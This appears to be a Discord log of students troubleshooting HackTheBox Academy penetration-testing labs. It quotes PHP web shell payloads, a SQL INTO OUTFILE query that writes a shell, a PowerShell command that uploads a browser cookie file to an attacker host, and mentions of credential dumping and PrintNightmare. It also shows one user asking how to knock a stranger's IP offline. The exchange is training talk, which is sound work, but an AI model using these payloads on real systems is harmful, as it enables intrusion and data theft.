#modules

.-.

I don't think I ever got the sql route to work on that challenge

if you upload the with the ||ftp|| it won't run normal php for some reason

i only found out about that route after someone i help tell me the flag said there is multiple way

Hmm it still doesn't run. I'm writing as ||SELECT "<?php system('powershell d'); ?>" INTO OUTFILE 'C:\CoreFTP\shell7.php';||
And accessing with
||┌──(kali㉿kali)-[~/htb-academy/infra/skills-easy] └─$ curl -k -H "Host: $target" --basic -u user:pass https://10.129.34.95/shell7.php <?php system('powershell d'); ?> ||

yeah my notes unhelpfully end like half way through it.

if its any consolation the rating of the labs are totally wack, easy lab is the hardest, hard lab is medium, and the medium lab is easiest

that path is no good

oh yeah the lab rating on this module is kinda weird

btw u have to use double \ @solar granite

I did but discord removed them for some reason

nope if you upload with sql you don't need to do that a normal <?php echo shell_exec($_GET['cmd']);?> will run just fine

oh

@solar granite dm me user and pass

i didnt note that

my actual redacted notes for the medium lab include being shocked by how easy it was.

Works now.

I was indeed writing to the wrong directory

<?php system('whoami'); ?> works wonders

oh yeah i remember that's the stupidly easy and still there are many people dm me about that lab

we all get stuck on some stupid simple stuff occasionally ¯_(ツ)_/¯

yeah it can run normal cmd but powershell it less buggy for me

@shy warren check the discussion above, I remember you had the same issue

mind if i dm you real quick?

Sure

yeah

i was goiing to say u that xd

also let me guess 90% of the people asking just didnt do that little tiny extra step of due diligence during enumeration lol

more like 100%

that tracks

Literally the first step. Not sure how to start.

Are you following the questions? Theyre pretty helpful guides for the order to do things. Did you skip over the scenario information about a webshell left for us?

Tbh I wasn't sure what to do with the webshell

the webshell is our foothold to the network, much like the footholds throughout the module

only real difference is I dont think that one comes prebuilt with attack tools, so you either have to transfer them over or run a proxy

Hello @vital adder, please check your personal message. Thanks

How can I get grep not to ignore everything past a \ ?

... discord removed it

\

\\

escape the escape

ahhh thanks

darn that didnt work still lol

whats your query?

test if code blocks makes things readable with \ or \\

it does

are you sure its

 inlanefreight.local\

Yeah results from cat

I might be over/under thinking it, but it seems completely alien to everything else in the module. I have no idea what to do.

I just want it to filter from my s onward

grep "INLANEFREIGHT.LOCAL\\s*"

add -i if you want to ignore case

I mean just start from step one. Have you connected to the webshell

hmmm nope didnt work i'm going to stare at the grep man page for a min

No, I wasn't sure how to go about doing that. I don't recall there being anything in the module about file upload vulnerabilities, or webshells for that matter.

The assessment module says the webshell was already left there for us and gives us the information on how to connect

Never forget to read the scoping and scenario information of an engagement 😉

i made an account on HTB academy, what modules should i do first?

depends on if you intend to do a path or not

if you do, just follow the path order. If not, Getting Started is great

What tool do I use to connect to it?

no tool

its a webshell

point your browser at it

Did you do the shells and payload module yet? or did you just hop straight into this one?

Just AD related modules so far. I've checked the IP with the browser. I'll look again in a bit

ah many of the modules are going to presume youre familiar with some general basic level stuff first.

and its not just the IP, the scenario tells you exactly how to connect to the webshell, you need to read it.

Anyone care providing some guidance on foot printing medium lab? I got two sets of creds, tried to RDP in the box with both sets. One set fails while the other throws an error due to an exclamation being in the password weirdly.

Thanks for your help, I'll revisit the assessment after a break and hopefully no more follow up questions

oh dont worry theyll probably be more questions, part 1 is pretty straightforward, but part 2 is definitely the hardest assessment Ive done so far being 60% of the way finished with the CPTS course.

that module sits at the 50% mark of the CPTS course and definitely has big Mid-Boss energy

@thorn urchin So the way to do it turned out to be grep -i "^[s]"

well thats certainly one way to do it

was driving me nuts I was not about to hand do it xD

I believe thatd match any lines with an S in it I think

it matches first characters

which could me more inclusive than you intend depending on your data

hi yall

the exclamation is being interpreted by bash, you need to enclose it in double quotes at the minimum if that doesnt work try to see about not passing the password on the cmd line

just to remind u yall im new here

I dont mean this harshly, but nobody cares. Got a question about the academy or modules ask away.

?

this channel is for the HTB Academy module discussion. If youre looking for advice on a module youre working on you can ask here. You can even ask for s recommended module to start. If you dont have a related question to that, then you should find a more appropriate channel. Being new or not holds no weight or relevance in this channel. Experienced and new alike just sharing information and helping each other grind out modules.

mad bro dont be rude

@thorn urchin

¯_(ツ)_/¯

just saying skip the "im new spiel" and get to learning 🙂

U can tell that softly

why I prefaced with 'I dont mean this harshly' 😉

Yeah saying that u can say all u want

because u prefaced

btw i dont want to discuss

Welcome. It is good to have you.

u think he left @unique valve

I dont think so.

yeah he left @unique valve

check common discord servers

I checked it says HTB is a mutual server.

not for me lol

Nvm you are right

btw losing the opportunity to learn for just that...

¯_(ツ)_/¯

What u guys talking about?

nothing special

Ok

is this about a module 🙂 ?

Oh sorry

no worries, you can try general chat

@idle cargo

Hi guys, by seeing the message above I just realised that I did not register with my uni email.
I tried to register with my uni email and it worked. So now I have two account on HTB academy.
And I don't know how to merge the two account (if it's possible).
Does anyone know who I should contact for this ?

Btw I created my HTB academy account like two days ago with my personal email, so it's not a big deal if I can't merge the two account. I'll just do the module that I completed again
||sorry if my English is bad it's not my primary language||

Thats definitely a contact support with the support chat bubble kind of question

thanks !

Ok so, by chatting with the bot I saw that I can change the email of my account, so I just deleted the account I created with my Uni email, and then changed my personal email to my Uni email in my main account.
It worked and now I can buy student subscription.

have anyone use parrotOS and have this issue?

Hi, got a problem with "Attacking Enterprise Networks". The windows 10 privesc using SysAx no longer works: https://www.exploit-db.com/exploits/50834 It worked like 1 time but then never again, throughout several resets. Even when it worked, I could ad ilfserveradm to the localadmin group but failed to run anything elevated with that user. Help would be greatly appreciated

Tried also print potato and SpoolFool but none worked. There's like 300 patches missing on this machine yet...

i got sum ones ip how do i boot him 84.17.35.77

yes, but couldn't find an answer unfortunately

Hello everyone, im doing the password cracking module, I cant seem to get evil winRM to work and I get the following error message : Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine. I'm working through the PWNbox does anyone know how to get past this error?

Is that the only message? Do you get a connection? That warning just means that you can't tab complete paths on the host you're connecting to.

Yeah, in retrospect that other module would have been helpful. 😂

yes I also get the message- Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

Maybe its that I was supposed to provide a user and password, as im supposed to do this after using crackmapexec, but cme didnt give me anything useful

That does mean that you need credentials. If you'd like to DM me some screenshots of the cme output I can try to help you.

sure thing, thanks, one second

is there anyone who is stuck on web request at the moment

i just started recently

Still need help, plz

many people are following the cpts pathway and not near the priv esc modules yet, so you may be waiting awhile

k k ... you think it's alright to contact support at HTB? I mean it clearly doesn't work as intended and outlined in the tutorial

possibly, if youre absolutely certain its a module bug you can also try putting it in the erratum channel. Some of the staff look a bit closer at that one.

Thanks for you help, @thorn urchin Can't be 100% sure but this privesc is really not difficult and it worked one time, then never again. This is a GUI app, not much potential for mistakes.

np, I wonder if its just an inherently unstable exploit

can someone help me with this module pls

sorry if i get annoying

anyone that can help me with proxychains... I feel like I'm missing some information to the actual settings in msfconsole and what the output is supposed to look like..

try using aptitude instead of apt-get

havnt done it yet sorry

i havent said what the module is yet

i finished it recently, what's up

you said earlier with web requesta

ye

maybe I misunderstood

which Module and section?

im stuck on post rn

your right

dw

Still need help? What's your issue?

what's troubling you in the POST section?

@rustic sage web proxies> proxy tools I'm supposed to use msfconsole to set the settings... but the thing is there is no remote machine in this section so what am I supposed to put for RHOST? and yes its the http_put section.. https://academy.hackthebox.com/module/110/section/1053

oh yeah for that one rhost is still the destination target

can i do a ban speedrun?

pls

you still have to have an end target to route through the proxy

I'm going to dm you so that it's easier to talk

ask @carmine kiln

OK

@carmine kiln pss

pls

gonna be quick

ok so my guess its the domain with the 8080 port setting?

let me double check cause theres like teo questions similar to that and idk which one youre on

okay nah

rhost would be the website youre testing on such as google.com

same with rport

all the proxy info goes into the PROXIES variable

ok ok ok so I got msf test file

in burpsuite

🙂

spoilers 😉

Thanks, and TBH I spent an hour trying to figure it out on my own.. coming here was last resort after an hour...

happens

it messed me up a little bit because I recorded the wrong format for setting the proxy in my notes

but that's why the practical section exists

yeah.. I'm used to putting the remote IP on there vs the domain..

everyday learning something new, thanks guys

not work

pip/pip3/pipx perhaps?

you will need to install aptitude

does it ask if you are OK with the solution? (when trying to install aptitude)

oh wait, you mean it ask the crackmapexec?

then no, i see nothing

hm, i am not sure then

oki thank you

hi

wb

oh well no one is here

ima play some games

reject games grind modules

Google crackmapexec wiki. Go to install instructions. Use the PIPX commands section.

@carmine kiln

Thanks. user banned

what would be the odds of getting the modules channel added as one of the channels people have to verify before being able to post from? seems like this channel gets a high target for such spam,trolls, ect and theyre almost always unverified accounts.

as soon as you said that, we got one below

Q.e.d

lmao

Will do, thank you

Hathor machine, I can't overwrite Bginfo64.exe and reverse the shell, how do I do it?

check the boxes channel, this one is for academy modules

Hi, Can I tell my doubts in this channel=

?

sorry, thank you

😄

here give both of this video a check
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM

this is a bad advice but if you script don't work try this #modules message

Hey guys, can anyone give me a nudge in "Windows Privilege Escalation" module?
I've tried every command in this section "Credential Theft/Other Files" but I can't find "bob_adm" credentials
EDIT: Found it! 🎉
||For anyone struggling with this one, start your search at C:\users\htb-student and include all (*.*) files||

I'm doing the web proxies module, and I've only ever used burp before this. I rather like ZAP! Is it feature-rich enough to be used in a professional environment, or is burp better?

hey guys

to active the openvpn

should it be a linux machine?

can i use kali vm?

hey guys, i'm doing "Information Gathering - Web Edition" and kind of stuck on "Active Subdomain Enumeration". If anyone if available to give me some help would be appreciate.

Hint for people wondering about people struggling on Windows Fundamentals "Which NT Version is installed" since the wording was a bit misleading for me:

||Hint: The answer is specific. E.g. "Windows 4" if the output was 4.xx.xx for the version. Don't overthink it!||

Just used sudo: hackerman

Really enjoying secure javascript coding 101

Expensive but good module

Hi guys any username wordlist to recommand for the SMTP part of Footprinting module? (https://academy.hackthebox.com/module/112/section/1072)
Currently trying with SecLists/Usernames/Names/names.txt with USR-25 python script but it's incredibly long
Thx

How are you tackling the learning in HTB Academy?

• Is it learn in HTB Academy while applying each techniques on HTB Labs
• Or, Finish the whole CPTS/CBBH path and then go with HTB Labs?
  -Or just the HTB Academy alone?

You can for exemple do all the web modules then go for a web box, after all AD modules -> AD box

Do we have existing list of web box? and other boxes that is related to the module?

I think most modules give you a few recommended boxes, at the end.

thanks! mine was the same, except for my paramter data, I had it written like it was in the request , I didnt keep it like the original template had it... 😮‍💨

I’m following the paths with the assessments and challenges within the modules and then will switch to boxes

Though I have done some boxes too in the meantime

@feral stump may I know how much time do you spend in the academy compare to the time in the boxes?

Right now much more the academy to boxes

I would say 70% - 30%

Of what I do in HTB

Overall

Thanks, just really struggling since I think I'm overwhelming myself with theories in academy and I think I'm losing my grip to practical hacking that can be done in Boxes in labs

Yeah have kind dame feeling sometimes too

Hello guys, I'm doing the Windows Privilege Escalation module and I have a problem for the section Pillaging: I found the cookies.sqlite file but I have to copy it in my pwnbox to execute a script on it, the problem is how can i get this file on my pwnbox ? I cannot execute python -m http.server 8080 on the RDP Windows session so I'm stuck to get this file

I think the last module of the CPTS path is a fully simulated pentest, so it makes more sense to me to finish up all the modules, before going back to doing boxes.

good to know that I am not alone haha

In the end with the knowledge of the academy I m kind of sure retaking boxes will be a matter of riding the bike with more skills … that’s the way I see it

Definitely, I was thinking the same but kind of doubting. But yeah, I will let you know once I finished a path and let's see if it makes me really better in solving boxes. Thanks!

Thank you too buddy !! Will let you know too

ask that at #boxes if you can't find that channel use ++verify at #bot-commands

about to say you can use updog for that

hello

I can't because it results in a 405 status code when i try to upload from windows to the box

wait how did you get Method Not Allowed? did you powershell curl or something?

I use this:

Invoke-RestMethod -Uri http://10.10.14.226:8080/ -Method Post -InFile C:\Users\Grace\cookies.sqlite -UseDefaultCredentials

also check the updog output or status when you upload a file (through a browser) it should show that you are uploading the to to /upload

yeah i'm trying powershell stuff with updog right now nothing seem to work (also you need to add /upload to the url)

on linux curl with updog will work fine

Do you know how to get this file (cookies.sqlite) into the box ?

go to your updog ip in a browser and upload from there

How do I do that ?

i can't remember which browser but there should be chrome installed or something use that

yeah but how am i supposed to upload a file with chrome to my box ?

with updog

Hi, I'm real stuck at sqlmap essentials skills assessment. I found attack vector, but I can't find right options. Could you help me in dm please?

sure shoot me a dm with your sqlmap command

I found a better way to transfer file: I use the +home-drive option with xfreerdp and the /home directory is mounted in Windows so I can copy easily the files, thanks for your help btw

oh yea i forgot you can do that with xfreerdp

usually i just use updog or metasploit if i don't have rdp

Hello im stuck on skill assesment hashcat

the last question

any help please?

how to scan docker hosts with nmap - nmap says scanned 0 hosts

sure what's the issue?

no idea why nmap said 0 hosts but if you mean the target machine docker then you can't scan it

i dont know how to start

but how to get the open ports then?

cracking all hashes by sure , but i get something like "...exhausted"

if it is a docker host (it should have public ip) it should give you the only port you can access if it isn't then you can scan it just fine

ohhhhhhhhh

for this you don't need to crack 100% of the hash

i am so dumm

Hey guys, I have the admin hash for the last question of the Pillaging section but it won't take it no matter what format I put it in. Can someone help me pls ?

Same here 😅

||Grabbed both SAM & SYSTEM files from 2 different backups, not accepted||
||Used password found in web.config file in another backup, not accepted||

the admin hash started with ||bac|| and end with ||f26||

if you got the right hash but it still show wrong answer try refresh the page or a hard refresh with ctrl + shift + R

||You've found it by dumping SAM & SYTEM files, right?||

yep

oh wait

this is just htb beginning evil hint ||try to Restore all of the backup||

Ok I found it, @devout thorn try every backup, there are only three and you'll find the hash which begins with ||bac||

thanks

||There are 3 backups, 2 of them contain SAM & SYSTEM files||
||When I'm using samdump2 on these files, I don't have this hash beginning with bac||

Did I miss something? 😅

oh wait what command did you use?

also that look corrupted

Lucky me ^^

all hash from both file are the same

||restore backups||
||Copy SAM & SYSTEM files to local machine||
|| sam2dump them into a file & john on final file||

oh try impacket-secretsdump

I'll try again

also remove the first line (too much spoiler)

if that still show you the same hash then i think the file is corrupted if that's the case try download a new one

ACTIVE DIRECTORY ENUMERATION & ATTACKS / Bleeding Edge Vulnerabilities

PrintNightmare attack

I dont know why this is not working

haven't done that module of tcm have a video on that vuln if it's just normal printnightmare give that video a check

who is tcm O.o

the guy make the video that i always link to people new to this

also here https://www.youtube.com/watch?v=awQjEm0etO0

ill watch the video ty tom :3

everything look right here but you should get a call back on this

the second ip (the one end with .255) should be your pwnbox ip and you are making / hosting the dll file in a directory named ws but in this command you are trying to access that file in a different and the wrong ip (that doesn't look like pwnbox ip ) haven't done the module anyone see this just follow the video

its not that

its an attack host in an AD network

thats not the pwnbox

oh

and i solved it following the video

i just changed how i start the smbserver

Same issue, resetting the VM

to this

it's more about the files but try everything you can

yep i forgot about that

im dumb yes 🙂

xD

For https://academy.hackthebox.com/module/143/section/1274 How did yall find the Sap Services group membership? Because || I couldn't login with the SapService user password so I had to WinRm as the sql user mentioned then do net user /domain SapService to get the answer. ||

Feel like I went about getting the answer in a werid way after I got the users account password that couldn't authenticate to squat.

I used mimikatz to get the hashes

oh wait what?

so the ||sam|| and ||system|| file in ||the backup|| is the same one being used on the target machine

Howdy, anyone mind nudging me the right way on the footprinting medium lab module? I got ||both set of creds and I can RDP in, but not sure how to access the SQL as the creds I have don’t work.||

Never mind I got it!

Can someone help me

I can’t send images here but it’s about figuring out specs

@winged hedge twice this dudes spammed this channel with his scam

Hi

Hey has anyone done the password attacks module?

is there anyone to consult Broken Authentication - Predictable Reset Token exercise? I have probably good script, but can't guess it in the end...

I'm just curious am I expected to remember most of the windows authentication process?

i just finished it

do you want me to dm you the script i have?

Hello everyone, I am on the module Information Gathering - Virtual Hosts, the problem I am having with the lab portion is that I am getting false positives on the enumeration of the vhosts. I have the first two flags but coming up short on the other 3 because I am not getting good names for the vhosts. Can someone point me in the right direction because I am stuck at this point

not necessarily.

not to crack passwords

I guess im trying to ask should I study it?

I usually make very comprehensive notes of modules

windows authentication is a very bulky process

I just remember the main parts. WinLogon, lsassl and SAM/Kerberos.

Comprehensive notes are good tho.

It never hurts...

I'm using Responder.py and it doesn't seem to work. I'm using my IP in the http URL. http://unika.htb/?page=//192.168.4.25/whatever

unless I need to use the IP from whatismyip ?

I've never heard of using fqdn's with responder but I might be wrong.

I'm not an expert. Maybe someone knows better.

hmm its on one of the starter tutorials called responder

it doesn't seem to get the AUTH hash

are you getting any traffic at all?

starting point -> tier 1 -> Responder

no nothing seems odd

listening on eth0

tthis looks like remote file inclusion or something.

yea

i don't think you can pivot like that with responder. It's supposed to be used with local machines.

"local"

big air quotes of course..

I haven't been in Starting Point for a while. someone might know better than me..

You'll probably find more help in the Starting point channel

oh I didnt see that channel oops

hmm I don't see it

Hey guys working on the Password Attacks module can someone point me in the direction where I can find more wordlists

for users and passwords

which part?

might need to link htb to your discord

Network services

On the first section you answer questions in

Scroll to the top and look for resources 😁

There's a downloadable wordlist

Oh I must have missed that

not sure how that works I don't see that group

So did I lmao

ahhh well I use the docker container

ill figure it out

thanks

for the help

You might need to verify.

On Discord.

oh

maybe, i dunno

I think you do

I still havent linked my account

I cannot see or access any of the main HTB stuff

only academy

then for sure heh..

should do that..

but then everyone will see im noooooob!!!!

ok got it

On that note, I have SMB access but no permission to view anything..

On the same module.

Password-Attacks: Network Services

Hi guys, Im doing the Password-Attacks: Network Services
I manage to identity the correct user to log in into RDP.
However, when i try to login using xfreerdp or remmina im unable to
Is there something im missing? Any suggestions would be more then welcome

I keep getting kicked off/connection problems. It may be my internet but it's not working out for me regardless.

Lots of timeouts

yeah man, i'm just frusturated with this. I think it's my internet.

how do you figure out what your own machine's IP is on a VPN network?

Decodify is pretty legit

ifconfig / ipconfig see if their is a tunnel interface, you could still be running via a vpn but thats probably beyond the depth that I can explain in text chat

Can anyone help me out on the Active Directory module?... ACL enumeration, the last question. I am either not understanding it right or not finding the answer. When I try to run the commands in the module the box mainly just hangs and doesn't return a response. The question is: What is the ObjectAceType of the first right that the forend user has over the GPO Management group?

I'm struggling too on host 1 Im feeling like im missing something... non of my payloads are landing

oh dang I was supposed to use tun0 and not eth0

that cleared it up

Literally me

Is there a section walkthrough on setting up VM for MacOS?

Went through this module (https://academy.hackthebox.com/module/details/87) and only saw sections for Windows and Linux

not trying to insult you, did you look on the VM site?

i saw something on there before when I installed it on my desktop

I have not actually... I'm sure I could find it, but wanted to see if there was anything on HTB?
Also, curious if HTB recommends NOT using Mac?

good question

I learned that there are NO "good" or "bad" questions, FYI 😉

I don't think I have seen anything for a Mac specifically, but you should be able to use VMware or virtual box on OSx

Or... Just blast OSX off and run Asahi Linux 🙂

haha no thanks, i prefer OSX, i mostly do software development, and OSX is king for that IMO

Makes sense, Asahi isn't ready for prime time yet anyway. I am all Linux aside from when work forces me to use Windows or BSD, but I am not a Dev at all!

also, it sounds like using VMs is a necessary evil for pen testing, in order to allow for easy spin-up/tear-down of different envs, etc

Absolutely! I ran kali on bare metal at the beginning, but its not a wise thing to do... I use both Proxmox for VMs and KVM locally on my linux machine. For HTB I pretty much always use a Kali VM on my local linux machine anymore. Parrot is pretty cool as well but I am way more use to Kali at this point.

nice! sounds fancy haha
im trying to get by with just pwnbox for the time being, until im forced to create my own setup 😅

Just bite the bullet and learn the VMs. It will help you in the long run, IMO, I can't stand the PWNbox. Plus if you doing Dev work... VMs are great place to test.

true, i know i will do it sooner than later
its my first dat on HTB though, so i have some time

VirutalBox would by my recommendation, in my little playing with OSX it worked great and its pretty much the same if you use it on Linux or Windows

sweet! yeah i think thats what i worked with in the past

do you know the different between virtualbox and vagrant?

i guess my main questions is: what is vagrant? lol

I'm no expert on this... but I believe vagrant is a tool to build Virtual Environments, vs something like VirtualBox which is a tool to run virtual machines.

mani thanks my friend, i was stuck for two days on this😎

Im doing lfi file inclusion prevention
Im having some trouble finding the php.ini file in file inclusion prevention

someone please help me out

or give me some hints

#module: Password Attack
#section: Network Service
#Question:Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

I cannot use xfreerdp to connect to the machine even tho i already have username and password, what should i do

Dm if you still need help

I'm on the INTRODUCTION TO BASH SCRIPTING module -> Comparison Operators. I can't tell if this is poorly written or I'm misunderstanding the question. Where does the Else fit into the equation?

Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.

@wide river try rdesktop

my command is||rdesktop -u john -p november||and this is what happen

@wide river so u need to first enable rdp

like this ? ||sudo systemctl start xrdp.service||

@wide river no

what command should i use to enable it?

@wide river read in the section about how to enable rdp

doing it, im using archlinux so it might a little different

This is why I stick to Kali or the pwnbox for certifications. Stuff is vetted to work and you can focus on studying Vice troubleshooting, but to each their own. I wouldn’t want to be fiddling around with stuff during the exam.

I use a VM for my hacking. With a decent computer now a days it’s possible to hack on any host OS.

I’ve got a question: dig url -t NS cannot reach the domain even though I added the up and domain to my /etc/hosts file.

It only works if I add the IP like: dig url @rustic sage -t NS

I can’t transfer the domain to the name server on the module

Yeah I don’t like to run bare metal it’s a pain to clean up after when I can just revert back a snap shot after a box. I like to revert back after every CTF to ensure if I installed anything to test its gone.

Is there another file on Linux I must edit to allow this to work?

@wide river use evil-winrm to enable the rdp

this is right 90% of the time but some time the pwnbox suck ass before it was the crackmapexec constantly having issue and now (for me) i have been troubleshooting bloodhound on the pwnbox for like 3-4 day now and turn out the issue is the Fing java version is wrong

now that's think outside the box, thank you so much

Broken Authentication/Brute Forcing Cookies/Question #2 Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer. I have tried all the roles I can think of and cant get this thing...any other hints?

if you are doing the info gathering module then all of the subdomain ip is dead you can only dump the dns record so watchout for that

i think you got false positive also pls remove those cred those are valid ||just for different service|| and i don't have any note on any issue with any so you should be able to use something like remmina to rdp in

hint the role is in the question

I am on that module. I can’t get the txt record cause the only way I can reach the domain is by adding the box IP at the end of the command ex: dig url IP -t NS

holycow, the boss show up and rescue the whole gang XD

When I try to do the zone transfer the command won’t work

i think this is what you are supposed to do (the ip at the end thing)

this is a bit too much spoiler shoot me a dm with your dns zone transfer command

Rgr, thanks. I’ll hit you up.

yeah i think that's is poorly written i didn't notice that but for this all i use is ||1 if || statement

@wide river no problem

Hello guys, I struggle with the Windows Privilege Escalation Assessment part 1 question 2 to find the ldapadmin password. I tried to ||findstr /spin "ldapadmin" *.*|| but can't get the password, can someone help me pls ?

hint that's the right command but you need to PrivEsc first before you can get the cred

The command didn't work i used ||lazagne.exe||

On the Active Directory / Privileged Access, i can't RDP to the box somehow. Both with remmina or xfreerdp (with and without password). Is it just me? This is so frustrating

Active Directory / Bleeding Edge Vulnerabilities, there is a problem to connect to the box with user forend. Works with htb-student though

For AD Enumeration, for the life of me I cant get the Ace Object type for the user forend for GPO management. I can literally see what it is in bloodhound but for what ever reason htb is saying thats not the right answer and its driving me nuts e.e

I've tried running the || Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$.SecurityIdentifier -eq $sid} -Verbose || cmd but its been running now for 15 mins and its still running .__.

yup the bloodhound answer isnt what its looking for and indeed that other command takes a long time to run. I think it was like 25-30mins for me. Just gotta be more patient sadly.

god dmaet let me reset the box then i killed it thinking it broke or something like 5 times now and I only have like 20 mins left x)

Finally got it, took a min almost done with the next page.

So why exactly do we need to change the SPN on the targeted user to Kerberoast them?

we dont need to change the spn, they need to HAVE a spn. If they dont hsve a spn you have to add one.

So if I understand correctly, its to tie to a "service" hence why the "machine" is going to Kerberos to request a tgs ?

Since under normal operations it just wouldnt be going to the Kerberos service for no reason at all, its to tie it to "something"?

https://youtu.be/-3MxoxdzFNI
I found this video to be really helpful for understanding kerberoasting

Great video

This is probably really simple, but for attacking common services - hard lab, how do I run a multi-line SQL query with impacket-mssqlclient? I found credentials for a user, I know what to do, but I can't for the life of me get the multi-line query to work, as it executes every line as I write them.
Edit: connected as impacket-mssqlclient -p PORT -windows-auth USER:'PASS'@IP

Edit: it was indeed really simple. Just run the whole query as a single command, with no newlines

what query are you trying to run

for some commands on that module i just ran them one at a time

The whole query is probably a spoiler, but it's a big ||SELECT ... FROM ... INNER JOIN ... ON ... WHERE ...||

idk something like that was never necessary for me in that lab

oh okay, looking through my notes, i was able to get that whole query to run

make sure there are no hidden new line characters, this happens sometimes when copying and pasting commands

There's none, but every line gets executed as soon as I write it
||SQL> SELECT distinct b.name [-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: The multi-part identifier "b.name" could not be bound.||

not sure why that is. do you have semi colons that separate? i have a screenshot of this command working and it's output if that would help

Nothing, it's exactly as I copy-pasted above. It worked fine with sqsh, but for some reason I can't connect with it, only impacket-mssqlclient works

Could you connect with sqsh?

oh so you are only putting that part of the command? include the rest in your query and it should work

i used impacket-mssqlclient to connect, didn't try sqsh

?

hey! I've just started hackthebox and im doing the "Linux Fundamentals" module. I've just done a question that asked "What is the path to the htb-students mail?" after logging into htb-student remotely. I got it right but I had to google the answer because I was lost. Can someone explain to me how people knew the path to "mail" would be shown by using the "env" command?

Doesn't work either. I copy-pasted the full query:
||SQL> SELECT distinct b.name [-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: The multi-part identifier "b.name" could not be bound. SQL> FROM sys.server_permissions a [-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: Incorrect syntax near the keyword 'FROM'. ...||

what you guys doing

I copy-pasted the whole query in one line and now it worked. Weird

Thank you for the sanity check

no problem! glad it worked

You couldn't really find that without googling. That's just how linux works.

Also remember that googling is encouraged, and more often that not it is necessary too, and definitely not "cheating"

yeah googling things is something ive gotten quite good at back when I started programming 😂 I'm learning linux now tho and cybersecurity so I can expand on what I can do with my programming. Thanks 👍

I'm now being asked "Which kernel version is installed on the system? (Format: 1.22.3)". I've just done "uname -v" and copied the output and pasted it as my answer but it says I'm wrong?

Notice that it wants a specific format

yes but i don't see that format when i do it

#126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 thats my output

You don't have to copy-paste the whole output, you can just grab what you need

Try uname -a, your answer is definitely in there

oh yeah i got it, i swear thats the release tho?

Yes. Questions are sometimes misworded / confusing. I recommend searching on discord for keywords for a sanity check, others might have had the same issues

Any luck with this one?

I escalated privilege first and then I used lazagne tool to search for passwords

Any nudge for the PrivEsc?
I've tried several exploits from Windows Exploit Suggester and no luck so far...

For attacking common services - hard lab: is it possible to also get a reverse shell? I can read the flag, just wondering about a shell

I DM you to avoid to much spoil here

Finally I managed to tell you here without spoil: try to look at the ||Miscellaneous Techniques|| section of the module it helps a lot

Thanks for the hint

damn i just finished that brute forcing cookies lesson...i was fighting myself the whole time

I'm having this issue thsts been raised in the past, could someone explain this?
It feels like the question is worded kind of confusingly.

Am I meant to create
"if counter = 35
Echo $variable | wc -c"
?

I've read through the module a few times but I may be overthinking it or something. Could use a nudge or helping hand with the wording if anyone has the time!

||Miscellaneous Techniques or Additional Techniques?||
||Nothing worked in the first one 😅 ||

Yes, that's exactly what you are supposed to do

||Miscellaneous Techniques in the Additional Techniques||

Thanks- still got errors, but as long as I know I'm on the right track ill just tinker around and think outside a lil ^^

@solar granite u are still stuck or

Hello, I'm currently working on the web attack module at Mass IDOR Enumeration. I found out the http method with Burp Suite. I just have no idea how to enter the parameter with curl on POST. Thanks for the help in advance

on the page, you can inspect, go to network and right click the POST and copy as CURL, the parameter will show up as --data-raw

@rustic sage

-d "uid=$i"

Nope, I'm done with the modules. I got the flag, but I was just wondering if it's possible to get a shell too for the hard lab

@solar granite yes it is possible while using powershell

in the linux fundamentals module, specifically in the "service and process management" section, the question asks Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer. I've done systemctl list-units --type=service | grep apparmor and it returned only 1 unit. The description of that unit is "Load AppArmor profiles" so i assumed that was it since it's the only unit returned. I entered the name of the unit as my answer and it says im wrong.

@sly tapir @kind turret thanks I will try both variants

Instead, grep for:
||```shell
Load AppArmor .*

do i wrap that in a string?

cuz it gives me an error

Yes as we are using regex

that same service popped up but it's not the right answer

DM me with what you are submitting as the answer

is this right? I get nothing ||curl -X POST --data-raw "uid=1" http://........../documents/||

@rustic sage There is no such option as --data-raw, use -d https://reqbin.com/req/c-g5d14cew/curl-post-example#:~:text=How to post form data,www-form-urlencoded".

mybad, i totally misread that... yea -d "" 😬

do I need the -H parameter too? Because somehow I still get no result with -d

@rustic sage DM me

I apologize, --data-raw is an option, however, it is not be used in this context.

Anyone in the AD section?

Anyone having or seen this issue in mimikatz?

Is there a reason I can log in to SMB and not being able to list/open anything??

I'm on a share but have zero permission for anything.

I've never encountered this before. I've never heard of such a thing.

yeah can def happen

Every google entry is related to "I can't login to SMB"...

Not relevant to what i'm trying to find.

If it's configured to not let me access anything, can I really do anything about it?

I would think not....

you can probably use the connection for some enumeration tasks but that's probably about it

I'm supposed to grab the flag from it, I believe.

find a better user perhaps

It's the password attack module.

which section

the network services section

I could try to find another user. I swear I didn't find one.

just subscribed to HTB academy! 😎

idk how i've missed a second user...

thatd do it

I must be blind

alright I got the XSS module up next and I absolutely hate XSS blehhhhhhh

hopefully I can just use my dislike of xss to power through it

any hints on how to read source code in file upload assessment?

hi, im trying to use nmap --script smb-os-discovery -p445 <host> but not seeing any output for the script, any ideas?

ah... i added the -d flag and now see this

Host script results:
| smb-os-discovery: 
|_  ERROR: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]

what does this mean?

Did you put the ip?

@sturdy kite Looks like you need a space after the p and the ip?

-p445 is port number

the command is correct, im getting an error in the script for smb-os-discovery

iirc I think smb-os-discovery actually requires more ports than just 445 cause I think it tries to fetch some of the standard rpc information. Id have to double check

not required but does sometimes use 139 as well

so try -p445,139

let me try that

the module im going through shows usage without port 139 though

which module/section?

https://academy.hackthebox.com/module/77/section/726

another issue im having is with SMB client: Error opening local file flag.txt

when running get <filename>

same error with this

dont really need to do smb-os-discovery for this one, but give me a moment and ill see if I get an error

right, i just wanted to test out everything it had talked about in the section

ah its a samba one

